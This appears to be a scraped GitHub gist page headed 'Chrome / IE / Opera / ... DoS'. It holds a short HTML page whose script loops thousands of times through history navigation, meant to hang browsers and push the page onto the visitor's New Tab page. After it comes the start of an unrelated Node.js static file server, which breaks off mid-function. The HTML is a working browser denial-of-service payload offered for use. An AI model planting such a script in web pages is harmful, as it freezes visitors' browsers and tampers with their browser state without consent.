Skip to content

Instantly share code, notes, and snippets.

View Ajedi32's full-sized avatar

Andrew Meyer Ajedi32

View GitHub Profile
@Ajedi32
Ajedi32 / dos.html
Last active September 14, 2018 20:37
Chrome / IE / Opera / ... DoS
<title>I'm on your homepage!</title>
<script>
for(let i=0; i<10000; ++i) {
document.location.href="#";
window.history.back();
window.history.forward();
}
</script>
<p>This page should soon be showing up on your New Tab page</p>
var http = require("http"),
url = require("url"),
path = require("path"),
fs = require("fs"),
port = process.argv[2] || 8888;
var subDirectory = 'public';
http.createServer(function(request, response) {